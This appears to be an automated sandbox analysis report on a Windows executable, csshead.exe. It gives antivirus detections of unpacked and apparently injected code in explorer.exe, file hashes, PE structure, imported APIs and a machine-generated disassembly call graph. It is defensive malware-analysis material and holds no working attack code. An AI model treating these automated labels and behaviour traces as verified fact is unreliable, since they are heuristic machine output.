Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0041C95B LoadLibraryA,LoadLibraryA,CreateEventA,GetClassLongA,SetClassLongA,GetCursorPos,GetCursorPos,WaitForSingleObject,WaitNamedPipeA,CreateFileA,SetNamedPipeHandleState,WriteFile,ReadFile,LookupAccountNameA,LocalFree,SetAbortProc,DrawFrameControl,LoadImageA,CreateEventA,GetCursorPos,GetCursorPos,DragQueryFile,CreateRectRgnIndirect,WaitForSingleObject,EnableMenuItem,GetDlgItem,OleInitialize,RegisterDragDrop,GetTopWindow,RevokeDragDrop,OleUninitialize,SetMenuItemInfoA,GetLastError,DrawMenuBar,GetMenuItemInfoA,BeginPaint,EndPaint,GetClientRect,EnumDateFormatsA,Sleep,0_2_0041C95B
Contains functionality to query windows version
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004064BC GetVersionExA,0_2_004064BC

Behavior Graph

Simulations

Behavior and APIs

Time | Type | Description
15:35:03 | API Interceptor | 3x Sleep call for process: csshead.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label | Link
0.2.csshead.exe.50000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
0.2.csshead.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1023574 |
0.0.csshead.exe.400000.0.unpack | 100% | Avira | TR/Patched.Gen |
1.2.explorer.exe.790000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen |
1.2.explorer.exe.770000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
0.1.csshead.exe.400000.0.unpack | 100% | Avira | TR/Patched.Gen |

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshots


Startup

  • System is w10native
  • csshead.exe (PID: 2236 cmdline: 'C:\Users\user\Desktop\csshead.exe' MD5: 9E3EA995E40B62ADAE78E93E6B30780C)
    • explorer.exe (PID: 972 cmdline: C:\Windows\explorer.exe MD5: FCBCED2A237DCD7EF86CED551B731742)
  • cleanup

Created / dropped Files

No created / dropped files found

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.472920800285694
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:csshead.exe
File size:321024
MD5:9e3ea995e40b62adae78e93e6b30780c
SHA1:35b1fdd71e01d72e4bd49d4c301ccd6b2a9ac0a3
SHA256:e3785b4cc4c314854e7ef225bc76a1853b0d1603016bbe5b5ffcc792e4b36972
SHA512:cc2d1fdab7a19dac3a338290790489a531d949057412e1807c067edb9c3d4a45005e6c74bae76226b47aa173726fbbbd5abbe3d0cd525027a1d42a8be6eadf26
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*I.dn(.7n(.7n(.7.^?7k(.7u..7J(.7gP.7i(.7gP.7I(.7n(.7.).7u.>7.(.7u.?7/(.7u..7o(.7u..7o(.7Richn(.7........PE..L...F.9[...........

File Icon

Static PE Info

General

Entrypoint:0x424d6e
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x5B392E46 [Sun Jul 1 19:40:54 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:77535e666d5a37b2da29fe59caf3bb3c

Entrypoint Preview

Instruction
call 00007FE325815C94h
jmp 00007FE32580D7CEh
push 0000000Ch
push 0043CD98h
call 00007FE325812AB1h
push 0000000Eh
call 00007FE325814C45h
pop ecx
and dword ptr [ebp-04h], 00000000h
mov esi, dword ptr [ebp+08h]
mov ecx, dword ptr [esi+04h]
test ecx, ecx
je 00007FE32580D971h
mov eax, dword ptr [00442C44h]
mov edx, 00442C40h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007FE32580D953h
cmp dword ptr [eax], ecx
jne 00007FE32580D96Eh
mov ecx, dword ptr [eax+04h]
mov dword ptr [edx+04h], ecx
push eax
call 00007FE32580B38Eh
pop ecx
push dword ptr [esi+04h]
call 00007FE32580B385h
pop ecx
and dword ptr [esi+04h], 00000000h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007FE32580D94Fh
call 00007FE325812AA0h
ret
mov edx, eax
jmp 00007FE32580D907h
push 0000000Eh
call 00007FE325814B11h
pop ecx
ret
int3
int3
int3
int3
int3
int3
int3
int3
mov edx, dword ptr [esp+04h]
mov ecx, dword ptr [esp+08h]
test edx, 00000003h
jne 00007FE32580D97Eh
mov eax, dword ptr [edx]
cmp al, byte ptr [ecx]
jne 00007FE32580D970h
or al, al
je 00007FE32580D968h
cmp ah, byte ptr [ecx+01h]
jne 00007FE32580D967h
or ah, ah
je 00007FE32580D95Fh
shr eax, 10h
cmp al, byte ptr [ecx+02h]
jne 00007FE32580D95Bh
or al, al
je 00007FE32580D953h
cmp ah, byte ptr [ecx+03h]
jne 00007FE32580D952h
add ecx, 04h
add edx, 04h
or ah, ah

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d278 | 0x190 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x45000 | 0x8964 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3a518 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31edc | 0x32000 | False | 0.537592773438 | data | 6.55027699615 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xc348 | 0xc400 | False | 0.43775908801 | data | 5.53658582571 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x40000 | 0x4aac | 0x2c00 | False | 0.263227982955 | data | 4.45525333861 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x45000 | 0x8964 | 0x8a00 | False | 0.948907382246 | data | 7.86989360139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x4e000 | 0x4642 | 0x4800 | False | 0.00222439236111 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RCDATA | 0x451e8 | 0x3e6b | data | English | United States
RCDATA | 0x49054 | 0x4080 | data | English | United States
RT_ICON | 0x4d0d4 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x4d1fc | 0x2e8 | data | English | United States
RT_GROUP_ICON | 0x4d4e4 | 0x22 | MS Windows icon resource - 2 icons, 16x16, 16-colors | English | United States
RT_VERSION | 0x4d508 | 0x300 | data | English | United States
RT_MANIFEST | 0x4d808 | 0x15a | ASCII text, with CRLF line terminators | English | United States

Imports

DLL | Import
KERNEL32.DLL | CreateThread, GetSystemInfo, GetCommandLineA, LockResource, lstrcatA, GetSystemTimeAsFileTime, SetConsoleCtrlHandler, CreateFileA, CreateFileW, FlushFileBuffers, WriteConsoleW, SetStdHandle, GetConsoleMode, GetConsoleCP, SetFilePointer, GetTickCount, QueryPerformanceCounter, GetFileType, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, LoadLibraryW, HeapCreate, CreateIoCompletionPort, GetModuleFileNameW, GetStdHandle, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, HeapSize, HeapReAlloc, TerminateProcess, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, HeapSetInformation, ExitProcess, RtlUnwind, ExitThread, VirtualQuery, VirtualProtect, EncodePointer, DecodePointer, InterlockedPopEntrySList, VirtualFree, IsProcessorFeaturePresent, HeapAlloc, GetProcessHeap, HeapFree, InterlockedPushEntrySList, InterlockedCompareExchange, VirtualAlloc, WaitNamedPipeA, SetNamedPipeHandleState, WriteFile, ReadFile, LocalAlloc, LocalFree, EnumDateFormatsA, Sleep, GetCurrentProcessId, LoadLibraryExA, FindResourceA, LoadResource, SizeofResource, FreeLibrary, GlobalAlloc, GlobalLock, GlobalUnlock, MulDiv, lstrcmpA, SetEvent, IsDBCSLeadByte, GetModuleHandleW, GetModuleFileNameA, CreateEventA, LoadLibraryA, WaitForSingleObject, CloseHandle, GetVersionExA, lstrcmpiA, GetModuleHandleA, GetProcAddress, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetLastError, lstrlenW, WideCharToMultiByte, DeleteFileA, OutputDebugStringA, DebugBreak, InterlockedIncrement, GetFileAttributesA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, lstrcpyA, lstrcpynA, lstrlenA, InterlockedDecrement, MultiByteToWideChar, SetLastError, GetCurrentThreadId, GetCurrentProcess, FlushInstructionCache, LeaveCriticalSection, EnterCriticalSection, GetStringTypeW, RaiseException
ADVAPI32.dll | RegDeleteKeyA, RegCreateKeyExA, RegOpenKeyExA, RegCloseKey, RegSetValueExA, RegQueryInfoKeyW, RegEnumKeyExA, RegQueryInfoKeyA, LookupAccountNameA, RegDeleteValueA
COMCTL32.dll | InitCommonControlsEx, ImageList_Destroy, ImageList_GetImageCount, ImageList_Draw, ImageList_DrawIndirect, ImageList_Create, ImageList_LoadImageA, ImageList_AddMasked
COMDLG32.dll | CommDlgExtendedError, GetOpenFileNameA, GetSaveFileNameA, GetFileTitleA
dxva2.dll | GetNumberOfPhysicalMonitorsFromHMONITOR
GDI32.dll | GetCurrentObject, CreateRectRgnIndirect, CreateDIBSection, CreatePatternBrush, CreateBitmap, PatBlt, SetBkColor, SetBrushOrgEx, SetTextColor, SetBkMode, GetViewportOrgEx, CreateFontIndirectA, SetViewportOrgEx, GetStockObject, GetObjectA, CreateSolidBrush, GetDeviceCaps, StartDocA, StartPage, TextOutA, EndPage, EndDoc, CreateMetaFileA, GetDIBits, CreatePen, Polyline, SetStretchBltMode, CreateCompatibleDC, BitBlt, DeleteObject, SetAbortProc, SelectObject, DeleteDC, CreateCompatibleBitmap
gdiplus.dll | GdipDisposeImage, GdipGetImageRawFormat, GdipLoadImageFromFile, GdipAlloc, GdipCloneImage, GdiplusShutdown, GdiplusStartup, GdipFree
mscms.dll | OpenColorProfileA
NETAPI32.dll | NetShareGetInfo
ODBC32.dll |
ole32.dll | CoInitialize, CoUninitialize, CoLockObjectExternal, RegisterDragDrop, RevokeDragDrop, CoResumeClassObjects, OleUninitialize, OleInitialize, CLSIDFromString, CLSIDFromProgID, CoGetClassObject, OleLockRunning, StringFromGUID2, CreateStreamOnHGlobal, GetHGlobalFromStream, CoTaskMemFree, CoRegisterClassObject, CoRevokeClassObject, CoTaskMemRealloc, CoTaskMemAlloc, CoCreateInstance, CoInitializeEx
OLEAUT32.dll | LoadTypeLib, UnRegisterTypeLib, RegisterTypeLib, VarUI4FromStr, SysAllocString, VariantClear, OleCreateFontIndirect, LoadRegTypeLib, OleCreatePictureIndirect, SysAllocStringLen, SysStringLen, VariantInit, SysFreeString
pdh.dll | PdhGetFormattedCounterValue
SHELL32.dll | DragQueryFileA, SHGetFileInfoA
SHLWAPI.dll | PathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA
USER32.dll | CreateMenu, LoadBitmapA, BeginDeferWindowPos, GetIconInfo, SetWindowContextHelpId, GetDlgItemTextA, CopyImage, SetClassLongA, GetCursorPos, EnableMenuItem, DrawMenuBar, GetMenuStringA, CheckMenuRadioItem, RemoveMenu, AppendMenuA, CreatePopupMenu, DefFrameProcA, LoadStringW, PostQuitMessage, SetMenuDefaultItem, GetWindowTextLengthA, GetWindowTextA, GetWindowLongA, GetParent, SetWindowTextA, GetSubMenu, SetWindowsHookExA, CallNextHookEx, GetSysColorBrush, GetKeyState, CharLowerA, UnhookWindowsHookEx, InflateRect, SystemParametersInfoA, SetRectEmpty, IsMenu, GetWindowDC, TrackPopupMenuEx, TrackPopupMenu, GetMenu, SetMenu, TranslateMDISysAccel, DialogBoxParamA, SetWindowPos, UnregisterClassA, MapWindowPoints, GetClientRect, GetMonitorInfoA, MonitorFromWindow, GetWindowRect, GetWindow, EndDialog, SetWindowLongA, GetClassInfoExA, LoadCursorA, TranslateAcceleratorA, RegisterClassExA, CreateWindowExA, SendMessageA, GetTopWindow, CharUpperA, LoadStringA, SetCursor, CharNextA, MessageBoxA, GetActiveWindow, WindowFromPoint, MessageBeep, GetSystemMenu, GetCapture, PtInRect, FrameRect, ModifyMenuA, DrawEdge, MonitorFromPoint, DrawFrameControl, DrawTextA, OffsetRect, SetRect, GetClassLongA, GetMenuDefaultItem, SetMenuItemInfoA, IsIconic, AdjustWindowRectEx, DefMDIChildProcA, GetMessagePos, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, DrawIconEx, GetWindowThreadProcessId, IsWindowEnabled, IsWindowVisible, UpdateWindow, PostMessageA, LoadMenuA, LoadAcceleratorsA, RegisterWindowMessageA, CharNextW, DestroyMenu, CreateAcceleratorTableA, PostThreadMessageA, ShowWindow, IsWindow, LoadIconA, DefWindowProcA, DispatchMessageA, TranslateMessage, GetMessageA, PeekMessageA, BringWindowToTop, GetLastActivePopup, DestroyWindow, LoadImageA, GetSystemMetrics, GetSysColor, MoveWindow, ClientToScreen, ScreenToClient, GetDC, GetDesktopWindow, SetFocus, GetFocus, DestroyAcceleratorTable, BeginPaint, EndPaint, CallWindowProcA, FillRect, ReleaseCapture, GetClassNameA, GetDlgItem, IsChild, SetCapture, RedrawWindow, InvalidateRgn, InvalidateRect, ReleaseDC, wsprintfA
WININET.dll | FtpPutFileEx
WINMM.dll | mmioSetInfo, mmioAscend
WINSPOOL.DRV | EnumPrintersA

Version Infos

Description | Data
LegalCopyright | Copyright (C) 2018
InternalName | template.exe
FileVersion | 1.0.0.1
CompanyName | TODO: <Company name>
ProductName | TODO: <Product name>
ProductVersion | 1.0.0.1
FileDescription | TODO: <File description>
OriginalFilename | template.exe
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage


Memory Usage


High Level Behavior Distribution


Behavior


System Behavior

General

Start time:15:34:40
Start date:03/07/2018
Path:C:\Users\user\Desktop\csshead.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\csshead.exe'
Imagebase:0x400000
File size:321024 bytes
MD5 hash:9E3EA995E40B62ADAE78E93E6B30780C
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:15:35:23
Start date:03/07/2018
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe
Imagebase:0x1230000
File size:4064320 bytes
MD5 hash:FCBCED2A237DCD7EF86CED551B731742
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Code Analysis


    Execution Graph

    Execution Coverage:13.8%
    Dynamic/Decrypted Code Coverage:0.7%
    Signature Coverage:18.9%
    Total number of Nodes:1918
    Total number of Limit Nodes:50

    Graph

20277->20278 20279 42e164 20278->20279 20280 422804 __woutput_l 38 API calls 20279->20280 20281 42e16f 20280->20281 20282 422804 __woutput_l 38 API calls 20281->20282 20283 42e17a 20282->20283 20284 422804 __woutput_l 38 API calls 20283->20284 20285 42e185 20284->20285 20286 422804 __woutput_l 38 API calls 20285->20286 20287 42e190 20286->20287 20288 422804 __woutput_l 38 API calls 20287->20288 20289 42e19b 20288->20289 20290 422804 __woutput_l 38 API calls 20289->20290 20291 42e1a6 20290->20291 20292 422804 __woutput_l 38 API calls 20291->20292 20293 42e1b4 20292->20293 20294 422804 __woutput_l 38 API calls 20293->20294 20295 42e1bf 20294->20295 20296 422804 __woutput_l 38 API calls 20295->20296 20297 42e1ca 20296->20297 20298 422804 __woutput_l 38 API calls 20297->20298 20299 42e1d5 20298->20299 20300 422804 __woutput_l 38 API calls 20299->20300 20301 42e1e0 20300->20301 20302 422804 __woutput_l 38 API calls 20301->20302 20303 42e1eb 20302->20303 20304 422804 __woutput_l 38 API calls 20303->20304 20305 42e1f6 20304->20305 20306 422804 __woutput_l 38 API calls 20305->20306 20307 42e201 20306->20307 20308 422804 __woutput_l 38 API calls 20307->20308 20309 42e20c 20308->20309 20310 422804 __woutput_l 38 API calls 20309->20310 20311 42e217 20310->20311 20312 422804 __woutput_l 38 API calls 20311->20312 20313 42e222 20312->20313 20314 422804 __woutput_l 38 API calls 20313->20314 20315 42e22d 20314->20315 20316 422804 __woutput_l 38 API calls 20315->20316 20317 42e238 20316->20317 20318 422804 __woutput_l 38 API calls 20317->20318 20319 42e243 20318->20319 20320 422804 __woutput_l 38 API calls 20319->20320 20321 42e24e 20320->20321 20322 422804 __woutput_l 38 API calls 20321->20322 20323 42e259 20322->20323 20324 422804 __woutput_l 38 API calls 20323->20324 20325 42e267 20324->20325 20326 422804 __woutput_l 38 API calls 20325->20326 20327 42e272 20326->20327 20328 422804 __woutput_l 38 API calls 20327->20328 20329 42e27d 20328->20329 20330 422804 __woutput_l 38 API 
calls 20329->20330 20331 42e288 20330->20331 20332 422804 __woutput_l 38 API calls 20331->20332 20333 42e293 20332->20333 20334 422804 __woutput_l 38 API calls 20333->20334 20334->20335 20335->20106 20336->20091 20340 42bfb2 RtlLeaveCriticalSection 20337->20340 20339 4255a6 20339->20081 20340->20339 20342 42fc60 20341->20342 20343 42fc3e 20341->20343 20342->20015 20343->20342 20344 42dc91 __ftbuf 38 API calls 20343->20344 20345 42fc59 20344->20345 20347 42db1e 20345->20347 20348 42db2a __control87 20347->20348 20349 42db32 20348->20349 20352 42db4d 20348->20352 20372 4251cb 20349->20372 20350 42db59 20353 4251cb __ftbuf 38 API calls 20350->20353 20352->20350 20356 42db93 20352->20356 20355 42db5e 20353->20355 20358 4251b8 __woutput_l 38 API calls 20355->20358 20375 43015e 20356->20375 20357 4251b8 __woutput_l 38 API calls 20371 42db3f __control87 20357->20371 20360 42db66 20358->20360 20362 425166 __woutput_l 11 API calls 20360->20362 20361 42db99 20363 42dbbb 20361->20363 20364 42dba7 20361->20364 20362->20371 20365 4251b8 __woutput_l 38 API calls 20363->20365 20385 42d421 20364->20385 20367 42dbc0 20365->20367 20369 4251cb __ftbuf 38 API calls 20367->20369 20368 42dbb3 20444 42dbea 20368->20444 20369->20368 20371->20342 20373 425e72 __XcptFilter 38 API calls 20372->20373 20374 4251d0 20373->20374 20374->20357 20377 43016a __control87 20375->20377 20376 4301c4 20379 4301c9 RtlEnterCriticalSection 20376->20379 20381 4301e6 __control87 20376->20381 20377->20376 20378 42c08b __XcptFilter 38 API calls 20377->20378 20380 430196 20378->20380 20379->20381 20382 43019f InitializeCriticalSectionAndSpinCount 20380->20382 20383 4301b2 20380->20383 20381->20361 20382->20383 20447 4301f4 20383->20447 20386 42d430 __ftbuf 20385->20386 20387 42d466 20386->20387 20390 42d485 20386->20390 20419 42d45b 20386->20419 20388 4251cb __ftbuf 38 API calls 20387->20388 20391 42d46b 20388->20391 20389 429814 __ld12tod 5 API calls 20392 42db1c 20389->20392 20393 42d4c4 20390->20393 20394 
42d4e1 20390->20394 20395 4251b8 __woutput_l 38 API calls 20391->20395 20392->20368 20397 4251cb __ftbuf 38 API calls 20393->20397 20396 42d4f4 20394->20396 20451 42d2b2 20394->20451 20399 42d472 20395->20399 20401 42dc3b _write_string 38 API calls 20396->20401 20400 42d4c9 20397->20400 20402 425166 __woutput_l 11 API calls 20399->20402 20403 4251b8 __woutput_l 38 API calls 20400->20403 20407 42d4fd 20401->20407 20402->20419 20404 42d4d1 20403->20404 20406 425166 __woutput_l 11 API calls 20404->20406 20405 42d79f 20408 42d7ae 20405->20408 20409 42da4f WriteFile 20405->20409 20406->20419 20407->20405 20410 425eeb __getptd 38 API calls 20407->20410 20411 42d869 20408->20411 20417 42d7c1 20408->20417 20412 42da82 GetLastError 20409->20412 20415 42d781 20409->20415 20413 42d518 GetConsoleMode 20410->20413 20424 42d876 20411->20424 20433 42d943 20411->20433 20412->20415 20413->20405 20414 42d541 20413->20414 20414->20405 20418 42d551 GetConsoleCP 20414->20418 20416 42dacd 20415->20416 20415->20419 20422 42daa0 20415->20422 20416->20419 20421 4251b8 __woutput_l 38 API calls 20416->20421 20417->20415 20417->20416 20420 42d80b WriteFile 20417->20420 20418->20415 20439 42d574 20418->20439 20419->20389 20420->20412 20420->20417 20428 42daf0 20421->20428 20425 42dabf 20422->20425 20426 42daab 20422->20426 20423 42d8e5 WriteFile 20423->20412 20423->20424 20424->20415 20424->20416 20424->20423 20464 4251de 20425->20464 20430 4251b8 __woutput_l 38 API calls 20426->20430 20427 42d9b4 WideCharToMultiByte 20427->20412 20431 42d9eb WriteFile 20427->20431 20432 4251cb __ftbuf 38 API calls 20428->20432 20435 42dab0 20430->20435 20431->20433 20434 42da22 GetLastError 20431->20434 20432->20419 20433->20415 20433->20416 20433->20427 20433->20431 20434->20433 20437 4251cb __ftbuf 38 API calls 20435->20437 20437->20419 20438 430224 WriteConsoleW CreateFileW __ftbuf 20438->20439 20439->20412 20439->20415 20439->20438 20440 42d620 WideCharToMultiByte 20439->20440 20441 430055 42 API calls 
__Stoull 20439->20441 20443 42d6a5 WriteFile 20439->20443 20461 42de77 20439->20461 20440->20415 20442 42d651 WriteFile 20440->20442 20441->20439 20442->20412 20442->20439 20443->20412 20443->20439 20482 4301fd RtlLeaveCriticalSection 20444->20482 20446 42dbf0 20446->20371 20450 42bfb2 RtlLeaveCriticalSection 20447->20450 20449 4301fb 20449->20376 20450->20449 20469 4300f5 20451->20469 20453 42d2d0 20454 42d2e9 SetFilePointer 20453->20454 20455 42d2d8 20453->20455 20456 42d301 GetLastError 20454->20456 20459 42d2dd 20454->20459 20457 4251b8 __woutput_l 38 API calls 20455->20457 20458 42d30b 20456->20458 20456->20459 20457->20459 20460 4251de __ftbuf 38 API calls 20458->20460 20459->20396 20460->20459 20462 42de3f __isleadbyte_l 40 API calls 20461->20462 20463 42de86 20462->20463 20463->20439 20465 4251cb __ftbuf 38 API calls 20464->20465 20466 4251e9 __woutput_l 20465->20466 20467 4251b8 __woutput_l 38 API calls 20466->20467 20468 4251fc 20467->20468 20468->20419 20470 430102 20469->20470 20471 43011a 20469->20471 20472 4251cb __ftbuf 38 API calls 20470->20472 20473 4251cb __ftbuf 38 API calls 20471->20473 20477 430159 20471->20477 20474 430107 20472->20474 20475 43012b 20473->20475 20476 4251b8 __woutput_l 38 API calls 20474->20476 20479 4251b8 __woutput_l 38 API calls 20475->20479 20478 43010f 20476->20478 20477->20453 20478->20453 20480 430133 20479->20480 20481 425166 __woutput_l 11 API calls 20480->20481 20481->20478 20482->20446 20484 42b1d7 RtlLeaveCriticalSection 20483->20484 20485 42b1c4 20483->20485 20484->20021 20488 42bfb2 RtlLeaveCriticalSection 20485->20488 20487 42b1d4 20487->20021 20488->20487 20503 4221dd 20489->20503 20491 414182 20492 4221dd 42 API calls 20491->20492 20493 414189 RtlLeaveCriticalSection 20491->20493 20492->20493 20493->19902 20495 4101a4 GetWindowLongA 20494->20495 20496 4101d9 20494->20496 20495->20496 20498 4101bf SetWindowLongA 20495->20498 20497 4101ff 20496->20497 20499 421e7e 3 API calls 20496->20499 20498->20496 
20499->20497 20512 421de4 20500->20512 20502 421e8b 20502->19918 20504 4221ec 20503->20504 20505 422207 20503->20505 20504->20505 20506 4221f8 20504->20506 20507 42221c 20505->20507 20509 4252ae 39 API calls 20505->20509 20508 4251b8 __woutput_l 38 API calls 20506->20508 20510 425201 41 API calls 20507->20510 20511 4221fd setSBUpLow 20508->20511 20509->20507 20510->20511 20511->20491 20513 421e07 RtlInterlockedPushEntrySList 20512->20513 20514 421df6 GetProcessHeap HeapFree 20512->20514 20513->20502 20514->20502 23461 408bf8 RegOpenKeyExA 23464 408c4b 23461->23464 23468 4038b0 RegQueryValueExA 23461->23468 23469 4038b0 RegQueryValueExA 23464->23469 23465 408c97 23470 403890 RegCloseKey 23465->23470 23467 408ca2 23468->23464 23469->23465 23470->23467 20729 42b034 20730 42b041 20729->20730 20731 42a124 __XcptFilter 38 API calls 20730->20731 20732 42b05b 20731->20732 20733 42a124 __XcptFilter 38 API calls 20732->20733 20734 42b074 20732->20734 20733->20734 20735 424c01 20775 429ef0 20735->20775 20737 424c0d GetStartupInfoW 20738 424c21 HeapSetInformation 20737->20738 20739 424c2c 20737->20739 20738->20739 20776 42769e HeapCreate 20739->20776 20741 424c7a 20744 424c85 20741->20744 20978 424bd8 20741->20978 20777 4260a2 GetModuleHandleW 20744->20777 20745 424c8b 20746 424bd8 38 API calls 20745->20746 20747 424c96 __RTC_Initialize 20745->20747 20746->20747 20800 42ce7d GetStartupInfoW 20747->20800 20750 424cb0 GetCommandLineA 20813 42cde6 GetEnvironmentStringsW 20750->20813 20752 424664 __amsg_exit 38 API calls 20753 424caf 20752->20753 20753->20750 20757 424cd5 20834 42cab5 20757->20834 20759 424664 __amsg_exit 38 API calls 20759->20757 20760 424cdb 20761 424ce6 20760->20761 20763 424664 __amsg_exit 38 API calls 20760->20763 20854 424443 20761->20854 20763->20761 20764 424cee 20765 424664 __amsg_exit 38 API calls 20764->20765 20767 424cf9 20764->20767 20765->20767 20860 42ca56 20767->20860 20775->20737 20776->20741 20778 4260b6 20777->20778 20781 4260bf TlsAlloc 
20777->20781 20995 425d81 20778->20995 20783 426218 20781->20783 20784 426157 20781->20784 20783->20745 20784->20783 20986 4243ec 20784->20986 20789 4261b0 RtlDecodePointer 20792 4261c5 20789->20792 20790 426213 20791 425d81 40 API calls 20790->20791 20791->20783 20792->20790 20793 42a124 __XcptFilter 38 API calls 20792->20793 20794 4261db 20793->20794 20794->20790 20795 4261e3 RtlDecodePointer 20794->20795 20796 4261f4 20795->20796 20796->20790 20797 4261f8 20796->20797 20798 425dbe __XcptFilter 38 API calls 20797->20798 20799 426200 GetCurrentThreadId 20798->20799 20799->20783 20801 42a124 __XcptFilter 38 API calls 20800->20801 20807 42ce9b 20801->20807 20802 42d046 GetStdHandle 20808 42d010 20802->20808 20803 42d0aa SetHandleCount 20812 424ca4 20803->20812 20804 42a124 __XcptFilter 38 API calls 20804->20807 20805 42d058 GetFileType 20805->20808 20806 42cf90 20806->20808 20809 42cfc7 InitializeCriticalSectionAndSpinCount 20806->20809 20810 42cfbc GetFileType 20806->20810 20807->20804 20807->20806 20807->20808 20807->20812 20808->20802 20808->20803 20808->20805 20811 42d07e InitializeCriticalSectionAndSpinCount 20808->20811 20809->20806 20809->20812 20810->20806 20810->20809 20811->20808 20811->20812 20812->20750 20812->20752 20814 42ce02 20813->20814 20817 424cc0 20813->20817 20814->20814 20815 42ce6f FreeEnvironmentStringsW 20814->20815 20816 42a0df __getbuf 38 API calls 20814->20816 20815->20817 20818 42ce3d 20816->20818 20823 42cd2b 20817->20823 20818->20815 20819 42ce45 20818->20819 20820 42ce63 FreeEnvironmentStringsW 20819->20820 20821 422804 __woutput_l 38 API calls 20819->20821 20820->20817 20822 42ce5f 20821->20822 20822->20820 20824 42cd45 GetModuleFileNameA 20823->20824 20825 42cd40 20823->20825 20827 42cd6c 20824->20827 21010 4259a7 20825->21010 21004 42cb91 20827->21004 20830 42a0df __getbuf 38 API calls 20831 42cdae 20830->20831 20832 42cb91 _parse_cmdline 40 API calls 20831->20832 20833 424cca 20831->20833 20832->20833 20833->20757 20833->20759 
